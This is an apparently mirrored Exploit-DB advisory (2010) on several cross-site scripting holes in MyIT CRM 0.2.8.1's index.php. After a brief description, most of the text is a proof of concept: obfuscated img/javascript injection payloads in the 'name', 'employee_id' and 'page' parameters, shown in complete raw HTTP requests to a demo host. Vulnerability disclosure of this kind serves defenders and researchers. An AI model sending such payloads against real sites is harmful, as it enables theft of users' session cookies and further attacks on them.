MyIT CRM – ‘index.php’ Multiple Cross-Site Scripting Vulnerabilities

  • 作者: Juan Manuel Garcia
    日期: 2010-08-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/34392/
  • source: https://www.securityfocus.com/bid/42140/info
    
    MyIT CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
    
    An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
    
    MyIT CRM 0.2.8.1 is vulnerable; other versions may also be affected. 
    
    Proof of Concept:
    http://XXX.XXX.XXX.XXX/index.php?page=employees:main&page_title=View%20Employees
     
    * The parameter 'name' in the POST request has been set to:
    >"'><img%20src%3D%26%23x6a;
    %26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;
    %26%23x70;%26%23x74;%26%23x3a;alert(36078)>
    POST /?page=employees:main HTTP/1.0
    Cookie: PHPSESSID=5460a3d8ab4f72cc624e1a6744f5ecfd
    Content-Length: 159
    Accept: */*
    Accept-Language: en-US
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
    Host: demo.myitcrm.com
    Content-Type: application/x-www-form-urlencoded
    Referer: http://demo.myitcrm.com/index.php?page=employees:main&page_title=View%20Employees
    name=>"'><img%20src%3D%26%23x6a;
    %26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%2
    3x70;%26%23x74;%26%23x3a;alert(36078)>&submit=Search
    * The parameter 'employee_id' in the GET request has been set to:
    >"'><img%20src%3D%26%23x6a;
    %26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;
    %26%23x70;%26%23x74;%26%23x3a;alert(55255)>
    GET /?page=employees:employee_details&employee_id=>"'><img%20src%3D%26%23x6a;
    %26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%2
    3x70;%26%23x74;%26%23x3a;alert(55255)> HTTP/1.0
    Cookie: PHPSESSID=4b54d326030a5967e44f5719747a7c86
    Accept: */*
    Accept-Language: en-US
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
    Host: demo.myitcrm.com
    Referer: http://demo.myitcrm.com/?page=employees:main
    * The parameter 'page' in the POST request has been set to:
    >%22%27><img%20src%3d%22javascript:alert(35665)%22>
    POST /?page=>%22%27><img%20src%3d%22javascript:alert(35665)%22> HTTP/1.0
    Cookie: PHPSESSID=b639ec20245375dcf4b1c3f25dfdf20f
    Content-Length: 19
    Accept: */*
    Accept-Language: en-US
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
    Host: demo.myitcrm.com
    Content-Type: application/x-www-form-urlencoded
    Referer: http://demo.myitcrm.com/index.php?page=employees:main&page_title=View%20Employees
    name=&submit=Search